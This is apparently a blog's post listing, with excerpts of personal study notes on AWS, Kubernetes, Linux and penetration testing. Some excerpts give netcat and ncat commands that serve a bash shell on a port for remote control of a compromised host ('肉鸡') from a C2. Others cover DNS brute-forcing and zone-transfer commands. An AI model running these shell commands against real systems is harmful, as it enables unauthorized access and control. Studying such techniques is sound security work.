- 博客(44)
- 收藏
- 关注
RSS订阅原创 使用kubeadm快速搭建单master节点的kubernetes集群
环境:AWS国际区master节点:1个node节点:1个OS:ubuntu 18.04运行环境:Docker网络组件:calico参考:https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/create-cluster-kubeadm/#pod-network检查环境ensure legac...
2020-02-09 11:25:47
270
AWS Certified Solution Architect Official Study Guide, 笔记 -ELB CloudWatch AutoScaling
ELBELB的作用和特性负载均衡器通过负载均衡还可以提供HA可以跨AZ转发支持4层的TCP流量,和7层的http/https, ssl流量提供一个CNAME入口提供健康检查,保证不会将优良发往有问题的后端节点ELB的种类按照是否连接外网分为两种internal LB 内网LBinternet facing LB 面向internet的LBHTTPS 的负载均衡h...
2019-10-14 06:57:47
477
原创 AWS Certified Solution Architect Official Study Guide, Study Notes -VPC
IntroductionVPC:Virtual private cloud, is a vritual network, provide logical isolationVPCeach VPC has itemssubnetsfrom /16 to /28AWS reserves first 4 and the last IP.subnets resides in one A...
2019-10-09 18:41:18
299
原创 AWS Certified Solution Architect Official Study Guide, Study Notes - EC2
EC2instance typesAMIsources of AMISecurely Using an Instanceaddressing an instanceinstance typesinstance types are classified basing on 4 dimensions:vCPUmemorystorage(size and type)network perf...
2019-10-05 17:46:50
327
原创 AWS Certified Solution Architect Official Study Guide, Study Notes - S3
AWS S3common use casesbackup and archive for on-premisesor cloud datacontent, media, software storage and distributionbigdata analyticsstatic website hostingCloud native mobile and internet app...
2019-09-28 21:33:54
531
原创 building a k8s cluster
from mastering k8sadding working node with kubeadmkubeadm join --token <token> --discovery-token-ca-cert-hash <discovery-token> --ignore-preflight-error=all
2019-04-09 01:22:39
108
原创 通过脚本设置crontab
############### 目的#############通过脚本设置crontab,可以允许通过脚本安装和配置服务器时设置crontab定时运行############## 实现#############echo "1 1 * * * your command >> /var/spool/cron/root############# 原理###########crontab 会在/var/s
2018-01-02 15:23:41
2061
原创 sbl.py
#!/usr/bin/python3import subprocessimport timeimport pexpect#this is the IP LIST file name and pathIPLIST = 'sbliplist.txt'DOMAINLIST = ['.hc.cn','.homecredit.cn']#this is the log file l
2017-08-13 22:06:18
210
原创 ka.py
#!/usr/bin/python3#jason.ge 10th of May 2017#version 0.a#py read a file in kasperskyanalyze folderimport sysCLEANMARKS = ['Backup Copy of Object Created','Disinfected On Restart','Object
2017-08-13 22:05:12
191
原创 linux 常用命令-查看文件
cp:复制 -a: -d: 当复制链接文件时复制文件属性 -f:强制复制,覆盖原文件 -i:覆盖之前询问 -p:将源文件的权限一起复制 -r:递归复制。针对带目录的复制 -s:复制为快捷方式 -u:update。只有目的文件比源文件旧,或者不存在的时候复制 rm:删除 mv
2017-08-09 23:05:14
186
原创 windows 提权
winlogon.exe 登陆进程,在这里输入用户名密码身份验证信息传给lsa authen api (local security assistant)LSASRV.DLL和身份验证数据库匹配。MSV1_0.DLL发一个令牌给LSASS
2017-06-23 22:18:40
339
原创 scapy
scapy: 用于抓包,修改包可单独使用,可作为python的库依赖:python_gnuplot使用例子:>>> arp = ARP() #调用ARP()函数,创建一个ARP类得实例>>> arp.display() #调用arp实例得一个方法,display,查看arp的参数###[ ARP ]### hwtype= 0x1 pt
2017-05-16 16:48:16
731
1
原创 netdiscover
netdiscover: 基于ARP 主动或者被动的发现WIFI或者交换网络的主机 或者用来监控ARP流量常用参数与选项 -i:接口。选择你监控的接口。比如eth0 -r:range 比如192.168.0.0/24 -l:从文件读取range列表 -p:被动模式 -t:每个ARP请求之间等待多久。单位毫秒。这个可
2017-05-16 16:14:21
1096
原创 ssh_by_list
import subprocessimport time#this is the IP LIST file name and pathIPLIST = 'd:/iplist.txt'#this is the log file locationLOGFILE = 'd:/iplistlog.txt'def _connect(b,fh2): try:
2017-05-05 13:53:55
210
原创 _addnod
import subprocessdef _read(): a = [] while True: new = input() if new=='end': break else: a.append(new) return aprint('welco
2017-05-05 13:51:49
247
原创 cs
import subprocessdef _pingtest(ip): #print('ping test: ping -n 2 %s'%ip) o = subprocess.getoutput('ping -n %s'%ip) if o.find('time='): print('[ + ] ALIVE') re
2017-05-05 13:50:58
226
原创 nmap 参数
C:\Users\xxx>nmap -hNmap 7.12 ( https://nmap.org )Usage: nmap [Scan Type(s)] [Options] {target specification}TARGET SPECIFICATION:关于被扫描主机的-IL=inputfilename=可以从文件中读取ip--exclude=顾名思义-sn=
2017-05-04 14:08:44
1061
原创 google基本语法
与/或/非+/OR/-+/- = +河北 +(保定 OR 沧州) -石家庄关键字中间有空格可以用双引号引起来“天王盖地虎 宝塔镇河妖” 设定关键字keyword:valueintitle=in title 在页面的标题中有xxx关键字 例子=intitle:魅族intext=in text 在内容中有某个关键字 例子=in
2017-04-27 20:38:10
743
原创 shodan
shodan.io语法keword:valuenet:8.8.8.8net:8.8.8.0/24country:CNcity:Beijingcisco tianjinapache beijingkeywords=net;port;country;city;os;org;geo;product;isp;hostname;https://tieba.baid
2017-04-26 21:16:35
340
原创 DNS字典爆破
fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txtdnsserver=任意DNS服务器sina.com.cn=想爆破的域名worllist=字典先会查询sina.com.cn的NS记录然后尝试区域传输dnsdict6dnsdict6 -d4 -t 16 -x sina.com.cn
2017-04-25 22:29:31
645
原创 DNS区域传输
区域传输dns服务器之间同步数据库的一种技术通常来讲,DNS的查询用的是UDP53,区域传输使用的TCP53dig @ns2.sina.com sina.com [email protected]=提供数据的服务器sina.com=第二个sina.com 是想要传输的数据的关键字。axfr=区域传输的选项这条命令就是=从ns2.sina.com 传输关于sina.c
2017-04-25 22:07:04
1535
原创 DNS 查询方式
DNS查询的基本方式有三种,非递归(non-recursive),递归(recursive)和迭代(iterative)。实际中可能是几种的混合。非递归查询DNS的客户端叫resolverresolver查询某一个DNS 服务器。服务器返回结果,可能有记录,也可能没有。但是不管如何,DNS查询结束递归查询resolver向DNS A查询,DNS A向DNS B查询,DN
2017-04-24 23:51:08
7997
原创 DIG (类似nslookup)工具介绍
DIGdig www.baidu.com any @8.8.4.4==== dig 的有点 ====1. 可以更好的筛选输出的内容,减少不必要的输出,利于变成 例子 dig +noall +answer any baidu.com| awk '{print $5}' +noall 和+answer是参数root@kali:~# dig
2017-04-24 21:25:29
2304
原创 nslookup 使用方法简介
域名和FQDN的区别例子:域名=sina.comFQDN=www.sina.com;mail.sina.com常见的域名记录的类型有A: 主机记录 name-->IPCname: 别名记录 别名(类似于外号name)-->真正的域名NS:name server 的记录。记录的都是DNS服务器MX: 邮件服务器的记录PTR:反向域名解析 IP-->域名
2017-04-24 21:10:32
2323
原创 渗透测试 被动信息搜集
原则1: 不与目标系统产生基础(产生接触的为主动信息搜集)原则2: 尽量避免留下一切痕迹信息收集内容IP段域名目标系统使用的技术架构-邮件地址--> 社会工程学文档和图片-->本身就可能是不小心泄露的内部信息公司地址公司组织架构-->社工,或者针对重要岗位进行攻击联系电话/传真号码人员姓名/职务目标系统使用的技术架构公开的商业信息--
2017-04-24 17:00:32
203
原创 tcpdump 简介
tcpdumplinux和unix自带的CLI抓包工具默认只抓每个包的钱68字节使用实例tcpdump -i : 使用的接口-s : size,抓的包的大小,写0的话是有多大,抓多大-w : write, 写到哪个文件-r : read 读一个文件-A : 以ASCII 码的形式显示内容-X : 显示内容,格式类似与wireshark-n : 显示I
2017-04-23 23:34:56
259
原创 wireshark
wireshark筛选器注意,在选择capture的时候,要在option里把杂合端口的选项勾上,才能进行杂合模式的抓包wireshark有两种筛选器 1. 抓包筛选器 2. 显示筛选器 在包结构中,右键指定的区域,可以加到筛选器里 筛选器语法实例 (udp) && !(ip.dst==192.168.1.1)
2017-04-23 11:58:17
204
原创 nc 的缺点
安全牛 web 安全笔记nc的一些缺点1. 没有加密,数据交换内容是明文,容易被监听2. 没有身份验证。当nc打开一个监听端口,任何人都可以链接3. ncat可以弥补nc的不足。ncat是nmap的组件。ncat可以产生一个加密的通道 A:ncat -c bash -allow 1.1.1.1 -vnl 333 -ssl B:ncat -nv 1.1
2017-04-22 21:46:02
1000
原创 网络安全监控 NSM 笔记
1. 入侵通常是一个持续一段时间的过程。NSM不阻断入侵,但是可以协助,在最终挫败入侵行为NSM的数据范围完整内容提取的内同会话数据 session data事物数据统计数据元数据报警数据可能的referencensmwiki.orgsnort-gui internet relay chatsecurityonion.blogspot.com
2017-04-21 18:09:50
1199
原创 nc 远程控制
=== nc 做远程控制 ===原理实际上和之前的传文本一样,服务器端起监听,客户端端去链接,之后监听的服务器端传一个自己的shell过去到客户端正向:侦听方为肉鸡,C2 访问肉鸡SERVER: nc -lp 333 -c bashCLIENT: nc -nv 1.1.1.1 333 或者反向:侦听方为C2,肉鸡访问C2SERVER :nc -lp
2017-04-20 23:14:44
2542
原创 nc 使用方法
安全牛web安全笔记=== NC ===nc 在做传输的时候可以被认为是一个简单的管道,可以直接传输输入其中的内同到被监听的端口。作用类似管道符 |cat xxx.mp4 | nc -lp 333读取xxx.mp4,然后送进管道开启一个nc进程,通过333进行通讯将管道中的xxx.mp4,作为输入,发送给nc的进程。nc会通过自己的端口333向外输出。
2017-04-20 21:52:24
1781
原创 netcat
netcat的使用方法简介NC能做的事情----取代telnet--------nc -nv 1.1.1.1 110--------nc -nv ip port----传输文本信息和文件/目录----加密的传输文件----远程控制/可以作为木马----机密所有的流量----做流媒体服务器----远程克隆硬盘
2017-04-16 22:04:29
220
原创 Shodan
shodan 是一个专门搜索联网的设备的网站。需要登录使用。https://shodan.io例子:port:554 has_screenshot:truenetsreen port:22 contry:CN city:Beijing
2017-04-16 20:53:30
392
原创 linux 常见命令
安全牛web安全笔记cp:复制文件或者目录----cp [option] 【src_file]-------- -f :force 强制复制文件或目录,不进行提示-------- -r 递归复制文件夹-------- -s 为某个文件创建软连接-------- -b 覆盖已有的文件前,对目标文件进行备份-------- -l 为文件创建硬链接,而不是复制文件
2017-04-13 21:07:26
217
原创 web service
安全牛web安全笔记webservice 安全考虑----使用api key 或者session token 实现和跟踪身份认证----身份认证由服务器完成,而非客户端----API key 用户名, session token 永远不要用url发送----RESTful默认不提供任何安全机制,需要使用ssl/tls保护传输数据安全----SOAP提供千余HTTPS的WS-
2017-04-06 17:52:28
121
原创 http协议基础
安全牛 web安全课程笔记http----明文----https只能提高传输层安全。而且不防中间人----无状态----cookie----cycle 请求\响应----header--------set-cookie 服务器发给客户端--------content-length 可以用于快速鉴别不同的页面 由服务器发给客户端--------lo
2017-04-06 16:49:45
303
原创 流量突发分析
安全牛web 安全工程师笔记1. 网络回溯分析----dump数据包----然后分析数据包----最真实,最全面2.网络回溯分析的作用----了解 行为规律----发现 异常----证明 取证,证明3. 回去流量方式----交换机镜像----tap4. 应用----流量异常----蠕虫----木马僵尸----
2017-04-06 16:05:22
2474
原创 web 安全 浏览器插件
flashgotautoproxytamper datacokkie importercookies manageruser agentswitcherhackbarlive http headerfirebugdownload youtube videos as MP4flagfoxhashrhttps://addons.mozilla.org
2017-03-31 17:51:06
559
原创 web 安全 kali 常用软件
flashplugin-nonfree gdebi 图形化安装deb包amule 电驴qbittorrent btgeany 一个多语言的开发环境stardict 英文字典meld 类似于beyond compare。比较两个文件差异的图形化工具ttf-wqy-microhei windows常用的字体kchmviewer 打开chm文件的freemindn
2017-03-31 17:50:13
354
转载 linux 查看系统信息命令
referenced from:http://www.cnblogs.com/ggjucheng/archive/2013/01/14/2859613.htmllinux查看系统的硬件信息,并不像windows那么直观,这里我罗列了查看系统信息的实用命令,并做了分类,实例解说。cpulscpu命令,查看的是cpu的统计信息.blue@blue-pc:~$ lsc
2017-03-31 14:26:35
348
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人